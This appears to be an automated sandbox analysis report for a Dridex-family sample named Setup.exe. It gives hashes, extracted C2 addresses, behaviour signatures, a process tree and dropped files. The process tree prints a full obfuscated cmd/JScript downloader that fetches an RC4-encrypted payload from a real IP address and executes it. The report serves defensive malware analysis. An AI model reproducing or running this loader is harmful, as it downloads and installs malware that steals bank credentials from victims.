Analysis

  • max time kernel
    149s
  • max time network
    139s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    10-04-2021 06:02

General

  • Target

    Setup.exe

  • Size

    451KB

  • MD5

    9852a5960fd257f8fb32fefd392fff6e

  • SHA1

    395c82e369964b35e006fd122e0895b3d8ea3126

  • SHA256

    95cac536659cb341775e07454f199c45968bf8ee16c7dfd4eb56a28af59d468d

  • SHA512

    9271dc3a39c27ee957aff2ce73c5cc2949e657f7380d43eb3e9b23911cc994f206a3e125465f2ebd94f6f8b029a12ce8f2a12fde02464e428fd47547ff442a85

Malware Config

Extracted

Family

dridex

Botnet

10111

C2

131.100.24.231:443

188.165.17.91:8443

185.148.169.10:2303

rc4.plain
rc4.plain

Signatures

  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

  • Dridex Loader 1 IoCs

    Detects Dridex both x86 and x64 loader in memory.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 7 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 30 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1068
    • C:\Users\Admin\AppData\Local\Temp\Q7APPWXLAT\multitimer.exe
      "C:\Users\Admin\AppData\Local\Temp\Q7APPWXLAT\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
      2⤵
      • Executes dropped EXE
      • Drops file in Windows directory
      • Suspicious use of WriteProcessMemory
      PID:1628
      • C:\Users\Admin\AppData\Local\Temp\Q7APPWXLAT\multitimer.exe
        "C:\Users\Admin\AppData\Local\Temp\Q7APPWXLAT\multitimer.exe" 1 101
        3⤵
        • Executes dropped EXE
        PID:1580
    • C:\Users\Admin\AppData\Local\Temp\609JMGKM6W\setups.exe
      "C:\Users\Admin\AppData\Local\Temp\609JMGKM6W\setups.exe" ll
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:272
      • C:\Users\Admin\AppData\Local\Temp\is-F0VTF.tmp\setups.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-F0VTF.tmp\setups.tmp" /SL5="$30158,1873631,71168,C:\Users\Admin\AppData\Local\Temp\609JMGKM6W\setups.exe" ll
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:396
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" https://catser.inappapiurl.com/redirect/57a764d042bf8/
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:960
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:960 CREDAT:275457 /prefetch:2
            5⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1804
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.26.109/?NDY3MDEw&VTdlEr&oa1n4=xH3QMrXYbRzFFYbfLf_KRqZbNU&s2ht4=zRGUWVxoqbk6rPE5qpZDLGpbf1DB6gqVmAH16-t_B0erFOfQe5zUawcwY3n4oMVllFoa2t2kKByhXOgJSFqBaIMg5Bq5aUELJv2FmjnbJHdM8hxBWG7GIB_OkYVF4gvAlTn6r7&fYhLNDYxNQ==" "2"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2008
              • C:\Windows\SysWOW64\wscript.exe
                wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.26.109/?NDY3MDEw&VTdlEr&oa1n4=xH3QMrXYbRzFFYbfLf_KRqZbNU&s2ht4=zRGUWVxoqbk6rPE5qpZDLGpbf1DB6gqVmAH16-t_B0erFOfQe5zUawcwY3n4oMVllFoa2t2kKByhXOgJSFqBaIMg5Bq5aUELJv2FmjnbJHdM8hxBWG7GIB_OkYVF4gvAlTn6r7&fYhLNDYxNQ==" "2"
                7⤵
                • Blocklisted process makes network request
                • Suspicious use of WriteProcessMemory
                PID:1608
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c zpl1w.exe
                  8⤵
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:1388
                  • C:\Users\Admin\AppData\Local\Temp\zpl1w.exe
                    zpl1w.exe
                    9⤵
                    • Executes dropped EXE
                    PID:740

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

2
T1112

Install Root Certificate

1
T1130

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    MD5

    61a03d15cf62612f50b74867090dbe79

    SHA1

    15228f34067b4b107e917bebaf17cc7c3c1280a8

    SHA256

    f9e23dc21553daa34c6eb778cd262831e466ce794f4bea48150e8d70d3e6af6d

    SHA512

    5fece89ccbbf994e4f1e3ef89a502f25a72f359d445c034682758d26f01d9f3aa20a43010b9a87f2687da7ba201476922aa46d4906d442d56eb59b2b881259d3

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    MD5

    5abb3994d9ed3debf64e8dfcf3f81820

    SHA1

    d3b61dbcafe7130bb2cb4277eb0f0fae9505e25e

    SHA256

    8d8e9ada5f4a93b0d9b4c04124dfad5e43c21ea2950afde35555333ef5a60c55

    SHA512

    6b82bdc63e4082d65f7b6cc3912a552d4f472b0a9619819539a29debc9298220024e4aeb430e5c9c57dbf95ca29cbd0a33e8aba3965da4b479318ea905ba0d71

  • C:\Users\Admin\AppData\Local\Temp\3.tMp
    MD5

    60fc00422b399db85f87d41b8328976d

    SHA1

    bb85034acad8025f97e5bb236443debaf8926e4b

    SHA256

    c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690

    SHA512

    16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

  • C:\Users\Admin\AppData\Local\Temp\609JMGKM6W\setups.exe
    MD5

    2f6511abc3a54d2ecadc0970805a0ad6

    SHA1

    a2b304428f02d9f4b23c24cc7fe80f319a51f204

    SHA256

    be315dc46922d27c67a50ebadaa0d47425f89108c5657841aaee35ae5375ec7e

    SHA512

    81165db7fd648f1944b3365722baff3884bebb8328c901a8e3e80c318ebba4c88c092df3982eaf013b3757047442a8fed93048222c5a757d45185bd93c835638

  • C:\Users\Admin\AppData\Local\Temp\609JMGKM6W\setups.exe
    MD5

    2f6511abc3a54d2ecadc0970805a0ad6

    SHA1

    a2b304428f02d9f4b23c24cc7fe80f319a51f204

    SHA256

    be315dc46922d27c67a50ebadaa0d47425f89108c5657841aaee35ae5375ec7e

    SHA512

    81165db7fd648f1944b3365722baff3884bebb8328c901a8e3e80c318ebba4c88c092df3982eaf013b3757047442a8fed93048222c5a757d45185bd93c835638

  • C:\Users\Admin\AppData\Local\Temp\Q7APPWXLAT\multitimer.exe
    MD5

    06fc19f6fe70a8c450c540de4c1035a5

    SHA1

    20a8ee3c7d00af6c0ddaf3b096abd861e3ce9a49

    SHA256

    aef8a31311d20b9eb0156b6f519fbb6354b5f299cf1d8eee272cf505d8769ae8

    SHA512

    ca2ac2345d095de6beda7464cf202ddab7b0ad6247da7f47d7add23745eedf44027c2d64d368988f815a756b1e082540062b8b1bdb9f2e7f08bd5d61a9d50135

  • C:\Users\Admin\AppData\Local\Temp\Q7APPWXLAT\multitimer.exe
    MD5

    06fc19f6fe70a8c450c540de4c1035a5

    SHA1

    20a8ee3c7d00af6c0ddaf3b096abd861e3ce9a49

    SHA256

    aef8a31311d20b9eb0156b6f519fbb6354b5f299cf1d8eee272cf505d8769ae8

    SHA512

    ca2ac2345d095de6beda7464cf202ddab7b0ad6247da7f47d7add23745eedf44027c2d64d368988f815a756b1e082540062b8b1bdb9f2e7f08bd5d61a9d50135

  • C:\Users\Admin\AppData\Local\Temp\Q7APPWXLAT\multitimer.exe
    MD5

    06fc19f6fe70a8c450c540de4c1035a5

    SHA1

    20a8ee3c7d00af6c0ddaf3b096abd861e3ce9a49

    SHA256

    aef8a31311d20b9eb0156b6f519fbb6354b5f299cf1d8eee272cf505d8769ae8

    SHA512

    ca2ac2345d095de6beda7464cf202ddab7b0ad6247da7f47d7add23745eedf44027c2d64d368988f815a756b1e082540062b8b1bdb9f2e7f08bd5d61a9d50135

  • C:\Users\Admin\AppData\Local\Temp\Q7APPWXLAT\multitimer.exe.config
    MD5

    3f1498c07d8713fe5c315db15a2a2cf3

    SHA1

    ef5f42fd21f6e72bdc74794f2496884d9c40bbfb

    SHA256

    52ca39624f8fd70bc441d055712f115856bc67b37efb860d654e4a8909106dc0

    SHA512

    cb32ce5ef72548d1b0d27f3f254f4b67b23a0b662d0ef7ae12f9e3ef1b0a917b098368b434caf54751c02c0f930e92cffd384f105d8d79ee725df4d97a559a3d

  • C:\Users\Admin\AppData\Local\Temp\is-F0VTF.tmp\setups.tmp
    MD5

    ffea47ed33ad5876771da0d9d4489e7b

    SHA1

    b79481ec06a71ce81255fdef3cfab55e07a99eaa

    SHA256

    d65548988a58773251e1d193a243ca98d5ee74fa371e0b47b759bb061c00f6c3

    SHA512

    27ec2cbc8e445080927ffb5408eaaf0fb8c0f6535f70201edebc1e44c21000185b92fd783f8dd5c4ef89a845a92a71feb75dd46290982b1bdbe271d2067d3f09

  • C:\Users\Admin\AppData\Local\Temp\zpl1w.exe
    MD5

    2cefacbc9b7534945d6472b2486df1d6

    SHA1

    c53404ea93b12e083ab9ea6a51fbe3e89eab59df

    SHA256

    66e4f06b22a0fa400fd12656dd6985ebd95e3d2d45d9d4fb76daf08583a2aeaf

    SHA512

    2b2e0efb088ef3ca0eaea6afc1a525d4e0a59425533f91ede2a1510b6e014be2beb7c2b3ed1f4883ceeb00219ff3c87ece872af631024ad1548ab0a554b49059

  • C:\Users\Admin\AppData\Local\Temp\zpl1w.exe
    MD5

    2cefacbc9b7534945d6472b2486df1d6

    SHA1

    c53404ea93b12e083ab9ea6a51fbe3e89eab59df

    SHA256

    66e4f06b22a0fa400fd12656dd6985ebd95e3d2d45d9d4fb76daf08583a2aeaf

    SHA512

    2b2e0efb088ef3ca0eaea6afc1a525d4e0a59425533f91ede2a1510b6e014be2beb7c2b3ed1f4883ceeb00219ff3c87ece872af631024ad1548ab0a554b49059

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\I84JSWK7.txt
    MD5

    274e6fb33ce055fc1c0b98862716068c

    SHA1

    be6f71f08fa852af33da4be53234e11c72274a9b

    SHA256

    bdf8c97cd65ec192521cd48772f59ceba8a91731419be498b59eda77d1ed662a

    SHA512

    5b4adeeb28d14d890a65b3a4f45d69bea2a9fcae73cdf4caa1944067bcd547c9af8af833a37d79cbe5d81d9344a737b6695a258f3606249b6ec8d85633e96fa8

  • \Users\Admin\AppData\Local\Temp\is-96CC2.tmp\_isetup\_isdecmp.dll
    MD5

    fd4743e2a51dd8e0d44f96eae1853226

    SHA1

    646cef384e949aaf61e6d0b243d8d84ab04e79b7

    SHA256

    6535ba91fcca7174c3974b19d9ab471f322c2bf49506ef03424517310080be1b

    SHA512

    4587c853871624414e957f083713ec62d50c46b7041f83faa45dbf99b99b8399fc08d586d240e4bccee5eb0d09e1cdcb3fd013f07878adf4defcc312712e468d

  • \Users\Admin\AppData\Local\Temp\is-96CC2.tmp\idp.dll
    MD5

    b37377d34c8262a90ff95a9a92b65ed8

    SHA1

    faeef415bd0bc2a08cf9fe1e987007bf28e7218d

    SHA256

    e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f

    SHA512

    69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

  • \Users\Admin\AppData\Local\Temp\is-96CC2.tmp\itdownload.dll
    MD5

    d82a429efd885ca0f324dd92afb6b7b8

    SHA1

    86bbdaa15e6fc5c7779ac69c84e53c43c9eb20ea

    SHA256

    b258c4d7d2113dee2168ed7e35568c8e03341e24e3eafc7a22a0d62e32122ef3

    SHA512

    5bf0c3b8fa5db63205a263c4fa5337188173248bef609ba4d03508c50db1fd1e336f3041ce96d78cc97659357a83e6e422f5b079d893a20a683270e05f5438df

  • \Users\Admin\AppData\Local\Temp\is-96CC2.tmp\psvince.dll
    MD5

    d726d1db6c265703dcd79b29adc63f86

    SHA1

    f471234fa142c8ece647122095f7ff8ea87cf423

    SHA256

    0afdfed86b9e8193d0a74b5752a693604ab7ca7369d75136899ff8b08b8c5692

    SHA512

    8cccbff39939bea7d6fe1066551d65d21185cef68d24913ea43f24b8f4e08a5581a9f662061611b15b5248f5f0d541e98d6f70164aaaad14d0856e76fabbfaa4

  • \Users\Admin\AppData\Local\Temp\is-F0VTF.tmp\setups.tmp
    MD5

    ffea47ed33ad5876771da0d9d4489e7b

    SHA1

    b79481ec06a71ce81255fdef3cfab55e07a99eaa

    SHA256

    d65548988a58773251e1d193a243ca98d5ee74fa371e0b47b759bb061c00f6c3

    SHA512

    27ec2cbc8e445080927ffb5408eaaf0fb8c0f6535f70201edebc1e44c21000185b92fd783f8dd5c4ef89a845a92a71feb75dd46290982b1bdbe271d2067d3f09

  • \Users\Admin\AppData\Local\Temp\zpl1w.exe
    MD5

    2cefacbc9b7534945d6472b2486df1d6

    SHA1

    c53404ea93b12e083ab9ea6a51fbe3e89eab59df

    SHA256

    66e4f06b22a0fa400fd12656dd6985ebd95e3d2d45d9d4fb76daf08583a2aeaf

    SHA512

    2b2e0efb088ef3ca0eaea6afc1a525d4e0a59425533f91ede2a1510b6e014be2beb7c2b3ed1f4883ceeb00219ff3c87ece872af631024ad1548ab0a554b49059

  • \Users\Admin\AppData\Local\Temp\zpl1w.exe
    MD5

    2cefacbc9b7534945d6472b2486df1d6

    SHA1

    c53404ea93b12e083ab9ea6a51fbe3e89eab59df

    SHA256

    66e4f06b22a0fa400fd12656dd6985ebd95e3d2d45d9d4fb76daf08583a2aeaf

    SHA512

    2b2e0efb088ef3ca0eaea6afc1a525d4e0a59425533f91ede2a1510b6e014be2beb7c2b3ed1f4883ceeb00219ff3c87ece872af631024ad1548ab0a554b49059

  • memory/272-71-0x0000000000400000-0x0000000000418000-memory.dmp
    Filesize

    96KB

  • memory/272-70-0x00000000756C1000-0x00000000756C3000-memory.dmp
    Filesize

    8KB

  • memory/272-68-0x0000000000000000-mapping.dmp
  • memory/396-85-0x0000000000500000-0x000000000050E000-memory.dmp
    Filesize

    56KB

  • memory/396-74-0x0000000000000000-mapping.dmp
  • memory/396-81-0x0000000000530000-0x000000000056C000-memory.dmp
    Filesize

    240KB

  • memory/396-83-0x0000000000240000-0x0000000000241000-memory.dmp
    Filesize

    4KB

  • memory/740-105-0x0000000000400000-0x0000000000463000-memory.dmp
    Filesize

    396KB

  • memory/740-104-0x0000000000220000-0x000000000025C000-memory.dmp
    Filesize

    240KB

  • memory/740-101-0x0000000000000000-mapping.dmp
  • memory/960-86-0x0000000000000000-mapping.dmp
  • memory/1068-60-0x00000000011F0000-0x00000000011F1000-memory.dmp
    Filesize

    4KB

  • memory/1068-62-0x0000000000680000-0x0000000000682000-memory.dmp
    Filesize

    8KB

  • memory/1388-97-0x0000000000000000-mapping.dmp
  • memory/1580-92-0x0000000000D00000-0x0000000000D02000-memory.dmp
    Filesize

    8KB

  • memory/1580-91-0x000007FEF4950000-0x000007FEF59E6000-memory.dmp
    Filesize

    16.6MB

  • memory/1580-89-0x0000000000000000-mapping.dmp
  • memory/1608-94-0x0000000000000000-mapping.dmp
  • memory/1628-78-0x000007FEF4950000-0x000007FEF59E6000-memory.dmp
    Filesize

    16.6MB

  • memory/1628-67-0x0000000000CB0000-0x0000000000CB2000-memory.dmp
    Filesize

    8KB

  • memory/1628-63-0x0000000000000000-mapping.dmp
  • memory/1804-87-0x0000000000000000-mapping.dmp
  • memory/2008-93-0x0000000000000000-mapping.dmp